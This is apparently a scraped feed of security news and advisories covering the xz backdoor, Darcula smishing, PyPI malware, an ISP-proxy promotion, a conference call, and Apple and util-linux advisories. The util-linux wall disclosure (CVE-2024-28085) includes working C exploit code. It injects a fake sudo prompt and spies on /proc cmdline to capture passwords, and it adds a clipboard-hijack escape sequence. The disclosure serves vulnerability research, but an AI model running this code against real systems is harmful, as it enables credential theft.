An easy-to-understand guide on how to backup your iPhone or iPad to iCloud automatically.

They say the only backup you ever regret is the one you didn’t make. iPhone backups can be used to easily move your apps and data to a new phone, to recover things you’ve lost, or to fix things that have failed.

The most convenient way to backup your iPhone is to have it backup to iCloud. Backups are made every day, automatically, provided your phone is connected to power and locked. Be aware though that backups take take up a lot of your iCloud storage, and your phones’ data plan if you choose to backup when you aren’t connected to Wi-Fi. If those are likely to be problems for you, you might prefer to backup your iPhone to your Mac.

This guide tells you how to enable backups to iCloud, and how to check that everything is working as you expect.

Open the **Settings** app.

Then tap where you see your name and **Apple ID, iCloud+, Media & Purchases**.

Next, tap **iCloud**.

Scroll down and tap **iCloud Backup**.

Toggle **Back Up This iPhone** to on.

This may reveal a **Back Up Over Cellular Data** or **Back Up Over Mobile Data** toggle. This creates backups when you aren’t connected to Wi-Fi. Because backups can use a lot of data, toggling this on may cause you to exceed your data plan.

Once you have made a backup, you can access it from this screen under **ALL DEVICE BACKUPS**.

You can return to the previous screen by tapping the **< iCloud** link at the top. This screen shows you how much storage space your backups are using. To see a little more detail, tap **Manage Account Storage**.

Scroll down the list of apps until you see **Backups** to see how much storage your backups are using.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 How to back up your iPhone to iCloud 

By Owais Sultan
Modern advancements have tilted the world into a tightly-knit web. Accessing localized content and resources can be hard…
This is a post from HackRead.com Read the original post: The Power of ISP Proxies: Unlocking Local Content and Resources

Modern advancements have tilted the world into a tightly-knit web. Accessing localized content and resources can be hard due to geographic restrictions or censorship. However, the utilization of ISP proxies offers a promising solution. ISPs deploy these proxies. They sit between users and the internet, enabling access to region-locked content and resources.

This article explores high-quality ISP proxy packages with IPs from various countries. It explains their transformative power and shows how they bypass barriers to information and enhance user experiences. ISP proxies can unlock streaming services and allow access to educational materials. They have huge potential. They can make online content access fairer. Join us as we delve into ISP proxies and their impact on internet access.

**The Limitations of Traditional Proxies**

Think of a proxy server as a go-between your device and the internet. It allows you to browse anonymously and shields your identity. With it, you can also access restricted content. It works by primarily masking your IP address, providing privacy, and bypassing censorship or access restrictions.

However, traditional datacenter proxies pose significant limitations since websites are good at spotting and blocking them. This is because they have recognizable patterns and often seem suspicious. So, if you rely on such proxies, you may be unable to access some content or resources. This limitation comes from the widespread use of datacenter IPs by many users, which makes them easy to identify and prone to blocking.

Also, datacenter proxies lack the geographical diversity of residential proxies. They are also less reliable. This further limits their effectiveness in accessing region-restricted content or evading detection. Also, their static nature makes them easy to blacklist. This reduces their usefulness for bypassing restrictions or staying anonymous online.

Therefore, traditional proxies offer some benefits in comparison. But, their limits show the need for more advanced solutions. In a more connected and monitored online world, there is a need for these.

****Introducing ISP Proxies: A Unique Solution****

Introducing ISP proxies provides a unique solution. They solve the limits of traditional proxies and are different from datacenter proxies. Individual Internet Service Providers (ISPs) provide them, linking them to real residential IP addresses. This difference is fundamental. It allows ISP proxies to offer a hybrid solution. It combines the anonymity of home proxies with the speed and reliability of datacenter proxies.

ISP proxies use residential IP addresses from ISPs. They offer users the authenticity and legitimacy that traditional proxies often lack. Websites are less likely to detect and block ISP proxies since they come from real residential locations and mimic real user behaviour.

Also, ISP proxies offer users faster connections and more reliability. They’re better than residential proxies because they use the infrastructure of established ISPs. This mix makes ISP proxies attractive. They are for users who want to access region-restricted content and avoid detection. They are also for users who want to stay anonymous online while having the benefits of reliable, high-speed internet access.

****Benefits of ISP Proxies****

ISP proxies offer several notable benefits that distinguish them from traditional proxies. Let’s go over some of them.

*   **Enhanced Anonymity and Security**

ISP proxies have a few key advantages. One of them is that they can provide better anonymity and security. ISP proxies use actual residential IP addresses. They are like real user connections. This stealthy approach makes it hard for websites to identify and block them. As a result, users get more privacy. They also get more security when browsing the internet. This makes it less likely that bad actors will track or target them.

*   **Increased Trust With Websites**

Websites tend to trust traffic from ISP proxies more than traditional ones. This is because ISP proxies mimic the behaviour of real users. They are less likely to get flagged as suspicious. As a result, users can do tasks like social media management or web scraping with more confidence. Websites blocking their traffic or implementing tight security measures against them is less likely.

*   **Access to Truly Local Content**

Many websites restrict access to content based on the user’s location. ISP proxies solve this by letting users select an IP address from several places around the world. This lets users access truly local content, which they couldn’t otherwise access.

These proxies help users with streaming region-locked content. They also help with accessing geo-restricted services and browsing localized websites. They let users overcome geographical barriers and have a more tailored online experience.

**Conclusion**

ISP proxies offer enhanced anonymity, increased trust in websites, access to local content, reliable performance, and compatibility with various applications. With their ability to provide real residential IP addresses, ISP proxies present a valuable solution for users seeking improved online privacy and access to region-restricted content.

1.  **Tools for Testing Your Proxy Servers**
2.  **Proxy or VPN for Netflix – Which is Best?**
3.  **Can You Secure Your Smartphone with a Proxy?**
4.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
5.  **What is Dark Web, Search Engines, What Not to Do on Dark Web**

The Power of ISP Proxies: Unlocking Local Content and Resources

Updated March 30, 2024: We have determined that Fedora Linux 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time, Fedora 40 Linux does not appear to be affected by the actual malware exploit, but we encourage all Fedora 40 Linux beta users to revert to 5.4.x versions.Editor's note: This post has been updated to more clearly articulate the affected versions of Fedora Linux and add additional mitigation methods.Yesterday, Red Hat Information Risk and Security and Red Hat Product Security learned that the l

_Updated March 30, 2024: We have determined that Fedora Linux 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86\_64.rpm and xz-libs-5.6.0-2.fc40.x86\_64.rpm. At this time, Fedora 40 Linux does not appear to be affected by the actual malware exploit, but we encourage all Fedora 40 Linux beta users to revert to 5.4.x versions._

_Editor's note: This post has been updated to more clearly articulate the affected versions of Fedora Linux and add additional mitigation methods._

Yesterday, Red Hat Information Risk and Security and Red Hat Product Security learned that the latest versions of the “xz” tools and libraries **contain** **malicious code** **that appears to be intended to allow unauthorized access. Specifically, this code is present in versions 5.6.0 and 5.6.1 of the libraries**. Fedora Linux 40 users may have received version 5.6.0, depending on the timing of system updates. Fedora Rawhide users may have received version 5.6.0 or 5.6.1. This vulnerability was assigned CVE-2024-3094.

**PLEASE IMMEDIATELY STOP USAGE OF ANY FEDORA RAWHIDE INSTANCES** for work or personal activity. Fedora Rawhide will be reverted to xz-5.4.x shortly, and once that is done, Fedora Rawhide instances can safely be redeployed. _Note that Fedora Rawhide is the development distribution of Fedora Linux, and serves as the basis for future Fedora Linux builds (in this case, the yet-to-be-released Fedora Linux 41)._

**At this time the Fedora Linux 40 builds have not been shown to be compromised.** We believe the malicious code injection did not take effect in these builds. However, Fedora Linux 40 users should still downgrade to a 5.4 build to be safe. An update that reverts xz to 5.4.x has recently been published and is becoming available to Fedora Linux 40 users through the normal update system. Concerned users can force the update by following the instructions at https://bodhi.fedoraproject.org/updates/FEDORA-2024-d02c7bb266.

_Updated March 30, 2024: We have determined that Fedora Linux 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86\_64.rpm and xz-libs-5.6.0-2.fc40.x86\_64.rpm. At this time, Fedora 40 Linux does not appear to be affected by the actual malware exploit, but we encourage all Fedora 40 Linux beta users to revert to 5.4.x versions._

**What is xz?**

xz is a general purpose data compression format present in nearly every Linux distribution, both community projects and commercial product distributions. Essentially, it helps compress (and then decompress) large file formats into smaller, more manageable sizes for sharing via file transfers.

**What is the malicious code?**

The malicious injection present in the xz versions 5.6.0 and 5.6.1 libraries is obfuscated and only included in full in the download package - the Git distribution lacks the M4 macro that triggers the build of the malicious code. The second-stage artifacts are present in the Git repository for the injection during the build time, in case the malicious M4 macro is present.

The resulting malicious build interferes with authentication in sshd via systemd.  SSH is a commonly used protocol for connecting remotely to systems, and sshd is the service that allows access.  **Under the right circumstances this interference could potentially enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely.**

**What distributions are affected by this malicious code?**

Current investigation indicates that the packages are only present in Fedora 40 and Fedora Rawhide within the Red Hat community ecosystem.

_**No versions of Red Hat Enterprise Linux (RHEL) are affected.**_

We have reports and evidence of the injections successfully building in xz 5.6.x versions built for Debian unstable (Sid). Other distributions may also be affected. Users of other distributions should consult with their distributors for guidance.

**What should I do if I am running an affected distribution?**

For both personal and business activities, immediately stop using Fedora 40 or Fedora Rawhide until you can downgrade your xz version. If you are using an affected distribution in a business setting, we encourage you to contact your information security team for next steps.

Additionally, for those running openSUSE distributions, SUSE has published a downgrade procedure at https://build.opensuse.org/request/show/1163302.

Urgent security alert for Fedora Linux 40 and Fedora Rawhide users

By Waqas
Some of the known targets of this iMessage phishing campaign are USPS (the United States Postal Service), DHL, Evri, Australia Post, Bulgarian Posts, and Singapore Post.
This is a post from HackRead.com Read the original post: New iMessage Phishing Campaign Targets Postal Service Users Globally

Netcraft Report Uncovers “Darcula” Platform Targeting Postal Services Worldwide via iMessage & RCS Phishing. Discover how USPS & global services are under attack and learn essential protection measures.

A new report by cybersecurity firm Netcraft has discovered a sophisticated phishing-as-a-service (PhaaS) platform called “Darcula.” This platform is being used to launch large-scale smishing attacks targeting the United States Postal Service (USPS) and global postal services across more than 100 countries.

Darcula represents a significant development in the world of cybercrime. Unlike traditional PhaaS platforms that rely on email communication, Darcula leverages iMessage and Rich Communication Services (RCS) messaging for its attacks. This allows cybercriminals to bypass SMS firewalls commonly used to block phishing attempts.

****Why iMessage and RCS?****

iMessage and RCS offer features like file transfers and enhanced media support, making them appear more legitimate than traditional SMS messages. Additionally, these messaging services are often used for personal communication, potentially lowering a user’s guard against potential phishing attempts.

****The Smishing Tactic****

The Darcula platform facilitates smishing attacks, a form of phishing that uses text messages to trick victims. These messages often impersonate legitimate organizations, such as postal services, and typically lure users into clicking malicious links or providing sensitive information.

Screenshots of the actual malicious text sent to a user (Credit: Netcraft)

In the case of attacks targeting postal services, the messages might impersonate the USPS or a similar national postal service, informing recipients of missed deliveries or requesting additional information for package clearance. Clicking the malicious link could lead to a fake website designed to steal the user’s login credentials, credit card information, or other sensitive data.

****Global Reach and Long History****

The Netcraft **report** reveals that Darcula has been operational for at least a year and has been used in attacks on users in the UK and the United States. The platform’s capacity to target postal services in over 100 countries highlights its global reach and the potential impact of these phishing campaigns.

Phishing pages to which a user is taken (Credit: Netcraft)

****Importance of Cybersecurity** Training**

While the use of iMessage and RCS introduces a new element to smishing attacks, basic security principles and training remain crucial in protecting oneself. Users should be wary of unsolicited messages, even those coming from seemingly familiar sources.

Phishing attempts often create a sense of urgency, urging users to click links or respond immediately. Taking a moment to verify the legitimacy of a message by contacting the sender directly through a verified phone number or website can help avoid falling victim to these scams.

According to Max Gannon, Cyber Intelligence Analysis Manager at Cofense, _“_Darcula, a very advanced phishing kit, paints a dire picture of phone-based phishing that individuals are not trained to avoid. This kit uses new techniques carefully designed to avoid security controls._“_

_“_While this advanced phishing kit is problematic and avoids common security controls, a user trained properly to detect phishing emails should be just as likely to detect phishing messages on other platforms,_“_ Max emphasised.

_“_The existence of this kit emphasizes the importance of training individuals to be more vigilant across platforms. Even if a trained individual were to fall for the phishing attempt and click the link, the request for sensitive information like credit card details or SSNs should raise immediate concerns,_“_ he added.

1.  Police Dismantle PhaaS Platform BulletProftLink
2.  Malspam targets hotels, spreading Redline and Vidar stealers
3.  Microsoft Warns of Tax Returns Phishing Scams Targeting You
4.  800 Fake “Temu” Domains Lure Shoppers into Credential Theft
5.  “Failure in Parcel Delivery” Email Drops Malware on USPS Users’ PC

New iMessage Phishing Campaign Targets Postal Service Users Globally

By Waqas
Are you a Python developer? Here's what you need to know!
This is a post from HackRead.com Read the original post: PyPI Suspends New Projects and Users Due to Malicious Packages

PyPI hit by malware attack! Malicious packages targeting crypto wallets & browser data. Platform suspends new users & projects. Learn how to stay safe and what you should do.

_This article has been updated with new information._

In a move to combat a large-scale malware campaign, the Python Package Index (PyPI), the official repository for third-party Python software, has suspended new user registration and project creation. This critical action comes after security researchers at Checkmarx identified a series of malicious packages targeting unsuspecting developers.

According to PyPI’s official update released on March 28th, 2024, at 2:16 UTC, the platform is taking proactive measures to “mitigate an ongoing malware upload campaign.” This suspension aims to disrupt the attackers’ efforts and protect the vast Python developer community.

****Checkmarx Discovers Deceptive Software****

The security team at Checkmarx identified a coordinated effort by threat actors to upload malicious packages onto PyPI. These packages are designed to exploit a common vulnerability known as typosquatting. Typosquatting tricks users into installing malware by using names and website addresses that closely resemble those of legitimate software.

Once installed, these malicious packages unleash a multi-stage attack. The initial payload targets a user’s cryptocurrency wallets, aiming to steal valuable digital assets. The attackers further expand their reach by scraping sensitive data from browsers, including cookies and extension information. Additionally, the malware attempts to steal various login credentials, potentially compromising a user’s entire digital ecosystem.

According to Checkmarx’s research shared with Hackread.com ahead of publication on Thursday, the most concerning aspect of this attack is the malware’s persistence mechanism. This mechanism allows the malware to survive system reboots, ensuring its continued operation even after a restart. This persistence significantly increases the difficulty of detection and eradication.

****PyPI Fights Back****

PyPI’s quick suspension of new user registration and project creation shows the platform’s commitment to user safety. This action also potentially disrupts the attackers’ ability to upload new malicious packages and provides PyPI with time to implement more robust security measures.

****What Developers Should Do****

While PyPI works to address the situation, developers are advised to exercise extreme caution when installing Python packages. Here are some essential security practices:

*   **Double-check package names and sources:** Meticulously verify the spelling and origin of any package before installation. Typosquatting relies on tricking users into installing the wrong software.
*   **Verify publisher reputation:** Research the publisher behind a package before trusting it. Look for established developers with a history of creating reliable software.
*   **Read reviews and ratings:** User reviews and ratings can offer valuable insights into a package’s legitimacy and functionality.
*   **Stay informed:** Keep yourself updated on the latest security threats targeting PyPI and the Python community.

****The Future of PyPI Security****

The PyPI security team is working to identify and remove all malicious packages from the platform. Additionally, they will be implementing tougher measures to prevent similar attacks in the future. Developers can expect further announcements from PyPI regarding the timeline for resuming new user registration and project creation.

This incident goes on to show how sophisticated cyberattacks have become especially when targeting the software development community. By working together, developers, security researchers, and platform operators like PyPI can create a safer and more secure environment for everyone.

****UPDATE Mar 28, 2024 – 12:56 UTC****

As of March 28, 2024, 12:56 UTC, PyPI’s official website states, “This incident has been resolved,” indicating that the registration of new projects and users is now enabled again.

1.  Why is learning Python important in Data Science?
2.  OpenSSF Launches Malicious Packages Repository
3.  6 official Python repositories plagued with cryptomining malware
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  GitHub Abused to Spread Malicious Packages on PyPI in Image Files

PyPI Suspends New Projects and Users Due to Malicious Packages

The util-linux wall command does not filter escape sequences from command line arguments. The vulnerable code was introduced in commit cdd3cc7fa4 (2013). Every version since has been vulnerable. This allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and wall is setgid. CentOS is not vulnerable since wall is not setgid. On Ubuntu 22.04 and Debian Bookworm, wall is both setgid and mesg is set to y by default.

Wall-Escape (CVE-2024-28085)

Skyler Ferrante: Escape sequence injection in util-linux wall

=================================================================  
Summary  
=================================================================

The util-linux wall command does not filter escape sequences from  
command line arguments. The vulnerable code was introduced in  
commit cdd3cc7fa4 (2013). Every version since has been  
vulnerable.

This allows unprivileged users to put arbitrary text on other  
users terminals, if mesg is set to y and wall is setgid. CentOS  
is not vulnerable since wall is not setgid. On Ubuntu 22.04 and  
Debian Bookworm, wall is both setgid and mesg is set to y by  
default.

If a system runs a command when commands are not found, with the  
unknown command as an argument, the unknown command will be  
leaked. This is true of Ubuntu 22.04. Debian Bookworm does not  
leak unknown commands in its starting configuration.

On Ubuntu 22.04, we have enough control to leak a users password  
by default. The only indication of attack to the user will be an  
incorrect password prompt when they correctly type their  
password, along with their password being in their command  
history.

On other systems that allow wall messages to be sent, an attacker  
may be able to alter the clipboard of a victim. This works on  
windows-terminal, but not on gnome-terminal.

=================================================================  
Analysis  
=================================================================

When displaying inputs from stdin, wall uses the function  
fputs_careful in order to neutralize escape characters.

Unfortunately, wall does not do the same for input coming from  
argv.

term-utils/wall.c (note that mvec is argv)  
```  
/*  
* Read message from argv[]  
*/  
int i;

for (i = 0; i < mvecsz; i++) {  
  fputs(mvec[i], fs);  
  if (i < mvecsz - 1)  
          fputc(' ', fs);  
}  
fputs("\r\n", fs);  
...

/*  
 * Read message from stdin.  
 */  
while (getline(&lbuf, &lbuflen, stdin) >= 0)  
        fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);  
```

Since argv is attacker controlled, and can contain binary data,  
this is exploitable. A simple PoC command:

        wall $(printf "\033[33mHI")

If you are vulnerable, this should show a broadcast with "HI"  
being yellow. If we instead run:

        echo $(printf "\033[33mHI") | wall

This should fail with "^[[33m" showing up before our message.

To make sure the PoC will work, make sure your victim user can  
actually receive messages. First check that mesg is set to y  
(`mesg y`). If a user does not have mesg turned on, they are not  
exploitable.

If you still can't receive messages, try running `su user` or  
accessing the machine through SSH. Note that just because you  
can't receive messages without first going through su/SSH, does  
not mean a user is not vulnerable.  
=================================================================  
Exploitation  
=================================================================

Most distros allow argument data to be seen by unprivileged  
users, and some distros run commands when commands are not found.  
We can use this to leak a users password by tricking them into  
giving their password as a command to run.

When I run the command xsnow in my terminal, I get the following  
output:  
```  
Command 'xsnow' not found, but can be installed with:  
sudo apt install xsnow  
```

Lets look at what new processes are created when I do this:  
```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- xsnow  
/usr/bin/snap advise-snap --format=json --command xsnow  
```

This is on Ubuntu, but similar commands exist on other systems.

As a simple demonstration let's create a fake sudo prompt for  
gnome-terminal, and then spy on /proc/$pid/cmdline.

fake sudo prompt:  
```  
#include<stdio.h>  
#include<unistd.h>

int main(){  
        char* argv[] = {"prog",  
                "\033[3A" // Move up 3  
                "\033[K"  // Delete prompt  
                "[sudo] password for a_user:"  
                "\033[?25l"  
                // Set forground RGB (48,10,36)  
                //      hide typing  
                "\033[38;2;48;10;36m",  
        NULL};

        char* envp[] = {NULL};

        execve("/usr/bin/wall", argv, envp);  
}  
```

cmdline spy:  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>

#define USLEEP_TIME 2000

int main(){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();

                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        int num = atoi(d_name);

                        if(num > current_max_pid){  
                                next_max_pid = num;  
                        }else{  
                                continue;  
                        }

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\n';

                        write(1, buf, ra);  
                }  
                current_max_pid = next_max_pid;  
                closedir(proc_dir);  
        }  
}  
```

If we run the cmdline spy and the sudo password prompt, the user  
may input their password as a command. It will look like the  
following on Ubuntu:

```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!  
/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!  
```

Some distros, like Debian, do not seem to have a command like  
command-not-found by default. There does not seem to be a way to  
leak a users password in this case then, even though we can send  
escape sequences to them.

This works, but the user has no reason to expect a password page  
at this point. Now that we have shown some exploitability, lets  
try and make it better.

Imagine we run the cmdline spy in one terminal, and then in  
another terminal we run `sudo systemctl status cron.service`.  
The spy will see the sudo process first, and then after the user  
types their password correctly they will see `systemctl status  
cron.service`.

```  
sudo systemctl status cron.service  
systemctl status cron.service  
```

An attacker could inject a password incorrect message as soon as  
the second process starts (password correct). The user will  
assume they typed their password incorrectly and enter it again.

watch for certain command  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>  
#include<string.h>

#define USLEEP_TIME 3000

int main(int argc, char** argv){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        if(argc != 2){  
                printf("Usage: prog search_string\n");  
                return 1;  
        }

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();  
                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\0';

                        // Check if proces is us  
                        if(strstr(buf, argv[0])){  
                                continue;  
                        }  
                        // Check against search string  
                        if(!strcmp(buf, argv[1])){  
                                write(1, buf, ra);  
                                write(1, "\n", 1);  
                                return 0;  
                        }  
                }  
                closedir(proc_dir);  
        }  
}  
```

Imagine our new spy code was compiled as watch, and our wall  
exploit was called throw.

We can now run:  
```  
./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";  
sleep .1; ./throw  
```

The first two commands will wait until the user runs

        sudo systemctl start sshd

and correctly types their password for sudo. Then our wall  
exploit sends our fake sudo prompt. We need to sleep for a short  
duration to make sure we cover up the command prompt.

During this process, we need to make sure our original spy code  
is logging all cmdline arguments, to recover the victims password

Example log from original spy:  
```  
./watch sudo systemctl start sshd  
sudo systemctl start sshd  
./watch systemctl start sshd  
systemctl start sshd  
bash  
./throw  
bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword  
/usr/bin/snap advise-snap --format=json --command SuperStrongPassword  
```

Now lets imagine a different style of attack. An attacker can  
change a users clipboard through escape sequences on some  
terminals. For example, windows-terminal supports this. Gnome  
terminal does not.

```  
#include<stdio.h>

int main(){  
        printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");  
}  
```

Since we can send escape sequences through wall, if a user is  
using a terminal that supports this escape sequence, an attacker  
can change the victims clipboard to arbitrary text.

Further references:  
  https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt  
  https://github.com/skyler-ferrante/CVE-2024-28085

util-linux wall Escape Sequence Injection

The 13th International Workshop on Cyber Crime, or IWCC, 2024 call for papers has been announced. It will take place July 30th through August 2nd, 2024 in Vienna, Austria.

    [APOLOGIES FOR CROSS-POSTING]CALL FOR PAPERS13th International Workshop on Cyber Crime (IWCC 2024 -https://www.ares-conference.eu/iwcc/)to be held in conjunction with the 19th International Conference onAvailability, Reliability and Security (ARES 2024 -http://www.ares-conference.eu) July 30 - August 02, 2024, Vienna, AustriaIMPORTANT DATESSubmission Deadline  May 12, 2024Author Notification  May 29, 2024Proceedings Version  June 18, 2024Conference    July 30 - August 02, 2024WORKSHOP DESCRIPTIONThe societies of today's world are becoming increasingly dependent on onlineservices, where commercial activities, business transactions, governmentservices and biomedical diagnostics are realized. This tendency has beenevident during the recent COVID-19 pandemic. These developments, along withthe growing number of military conflicts worldwide (Ukraine, Israel, etc.),have led to the fast development of new cyber threats and numerousinformation security issues that are exploited by cybercriminals. Theinability to provide trusted, secure services in contemporary computernetwork technologies has a tremendous socio-economic impact on globalenterprises as well as individuals.Moreover, the frequently occurring international frauds impose the necessityto conduct investigations spanning multiple domains and countries. Suchexamination is often subject to different jurisdictions and legal systems. Agood illustration of the above is the Internet, which has made it easier toprepare and perpetrate traditional - but now cyber-enabled - crimes. It hasacted as an alternate avenue for criminals to conduct their activities andlaunch attacks with relative anonymity, a high degree of deniability, andthe opportunity to operate in a border-agnostic environment. Worryingdevelopments in the abuse of artificial intelligence and machine learningtechnologies lead to the increased capabilities of malign actors wholeverage these tools to design and propagate disinformation, which isespecially dangerous (and effective) during emergencies and crises of allkinds. The developments in Generative Artificial Intelligence have alsoenabled the increase of criminal capabilities in the production,dissemination, and weaponization of high-quality, convincing fake contact(text, audio, images, and videos), which translates not only to the truthand trust decay among the affected societies but also to the enhancedcapabilities in orchestrating the sophisticated cyber crimes. Furthermore, nowadays, the majority of life-science-based techniques andresulting data hinge on information technologies. Despite their considerableadvantages, dependence on cyber technologies also exposes vulnerabilities.Various threats in the digital realm could target biomedical systems,leading to adverse consequences. The field of CyberBioSecurity wasestablished to assist bio-related sciences in comprehending potential cyberthreats and formulating defense approaches, recovery protocols, andresilience strategies. The increased complexity of communications and thenetworking infrastructure is making the investigation of these new types ofcrimes difficult. Traces of illegal digital activities are difficult toanalyze due to large volumes of data. Nowadays, the digital crime scenefunctions like any other network, with dedicated administrators functioningas the first responders. This poses new challenges for law enforcement and intelligence communitiesand forces computer societies to utilize digital forensics to combat theincreasing number of cybercrimes. Forensic professionals must be fullyprepared to be able to provide court-admissible evidence. To make thesegoals achievable, forensic techniques should keep pace with newtechnologies. Prevention, mitigation, and interdiction of new and emergingthreats necessitates an increasingly thorough and multidisciplinaryapproaches, but also requires the collaboration of all relevant actors andstakeholders in designing the technology regulation and cyber governancemeasures.The aim of this workshop is to bring together the research outcomes providedby researchers from academia and the industry. The other goal is to show thelatest research results in digital forensics and cyberbiosecurity amongstothers. We strongly encourage prospective authors to submit articlespresenting both theoretical approaches and practical case reviews, includingwork-in-progress reports.TOPICS OF INTEREST INCLUDE, BUT ARE NOT LIMITED TO:- Big Data analytics helping to track cybercrimes- Protecting Big Data against cybercrimes- Crime-as-a-service- Criminal abuse of clouds and social networks- Criminal to criminal (C2C) communications- Criminal to victim (C2V) communications- Criminal use of IoT, e.g., IoT-based botnets- Cyberbiosecurity- Cybercrime-related investigations- Cybercrimes: evolution, new trends and detection- Darknets and hidden services- Fake (incl. deepfake) and disinformation detection- Generative Artificial Intelligence and cyber crime- AI-enabled crime and terrorism- Mobile malware- Network anomaly detection- Network traffic analysis, traceback and attribution- Incident response, investigation and evidence handling- Internet governance- Novel techniques in exploit kits- Political and business issues related to digital forensics andanti-forensic - techniques- Anti-forensic techniques and methods- Identification, authentication and collection of digital evidence- Integrity of digital evidence and live investigations- Privacy issues in digital forensics- Ransomware: evolution, functioning, types, etc.- Steganography/steganalysis and covert/subliminal channels- Technology regulation- Novel applications of information hiding in networks- Watermarking and intellectual property theft- Weaponization of information - cyber-enhanced disinformation campaignsWORKSHOP CHAIRSArtur Janicki, Warsaw University of Technology, Poland; Kacper Gradoñ, Warsaw University of Technology, Poland;Katarzyna Kamiñska, Warsaw University of Technology, PolandSUBMISSION GUIDELINESThe submission guidelines valid for the workshop are the same as for theARES conference. They can be found athttps://www.ares-conference.eu/authors-area.

IWCC 2024 Call For Papers

Apple Security Advisory 03-25-2024-1 - Safari 17.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-1 Safari 17.4.1

Safari 17.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214094.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebRTC  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

Safari 17.4.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPKcACgkQX+5d1TXa  
IvpFfBAAvnUeX8jpQu9uS+hiv0FKFu/YUSafIVOutV2ls8jQbdd3HVKwIRNmTZ4g  
0u7drE/D9mTBMzfmvdyNKk4lrnsvgJYNgurGPudpqDr7LmzkDdn0DOWL5xxSs7Jx  
ekUxjtHiPtEPMs41gs9ZZMHiMhU/r6G9LaTa2WrRcrBeqkLnepmee9RfrSbXDV5q  
NMGio6W95JWgRLM0+c06Jk/A6VhnrxwqFug9NMDXr/EgxxMjG5mxZKY7qXXUcWe+  
D2CI/1SRI0ucAkIKN5IDFY5X4Y/XWvp8YeVqdtQQ6RmfJDEE9zPRFSlr/PKRFnba  
LfEPFzWCDMZ6qqP9eSph7+8wFLngWwksf0O9xBq6KF+LUqIVb9RkJ1VZnYZluTt4  
tT161H0aTHOq9LhcFbAA5kQbdpfX7aulYq1xkaGz1a2KJxYFmr1p26Q7HMWHw5Zz  
BlnRH4xsQkoKaU96WSylDUdO5DYiQ27cRQddvqP40xIOTaK/SBTUlEYDCviU+8Xs  
1KhLmuSgfnra+akn0vCmy5tu/+DzlmUT4kvJsvcOApDyKtoeSzPUYucw65RrcEo3  
Aa/3eT3R8o9S8mdq6c3OIEF16/2IyxT9fJJE0YeQTli8zmkTu0Pw0RG2DzQhnfI6  
lDKmfx3c1PyCOU3By0XIfqsI9t3oWXcvbAgSgnDC6lmnZ7X2KpY=  
=JCdc  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-1

